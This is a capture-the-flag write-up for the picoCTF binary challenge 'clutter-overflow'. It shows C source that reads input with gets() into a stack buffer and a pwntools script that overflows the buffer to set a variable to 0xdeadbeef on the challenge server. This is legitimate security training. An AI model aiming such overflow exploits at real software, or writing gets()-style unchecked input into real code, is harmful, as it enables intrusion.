Binary Exploitation

{"authors": ["ret2basic"]}

clutter-overflow

Solved by ret2basic

Challenge

Clutter, clutter everywhere and not a byte to use.

nc mars.picoctf.net 31890

chall.c chall

Recon

Recon

Source Code

#include <stdio.h>
#include <stdlib.h>

#define SIZE 0x100
#define GOAL 0xdeadbeef

int main(void)
{
  long code = 0;
  char clutter[SIZE];

  setbuf(stdout, NULL);
  setbuf(stdin, NULL);
  setbuf(stderr, NULL);

  puts(HEADER); 
  puts("My room is so cluttered...");
  puts("What do you see?");

  gets(clutter);


  if (code == GOAL) {
    printf("code == 0x%llx: how did that happen??\n", GOAL);
    puts("take a flag for your troubles");
    system("cat flag.txt");
  } else {
    printf("code == 0x%llx\n", code);
    printf("code != 0x%llx :(\n", GOAL);
  }

  return 0;
}

Solution

Overwrite the code variable with 0xdeadbeef.

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch='amd64', os='linux')
elf = ELF("./chall", checksec=False)

host = 'mars.picoctf.net'
port = 31890

#--------Overwrite variable--------#

offset = 0x110 - 0x8

payload = flat(
    b"A" * offset,
    0xdeadbeef,
)

r = remote(host, port)

r.sendlineafter('What do you see?\n', payload)

r.interactive()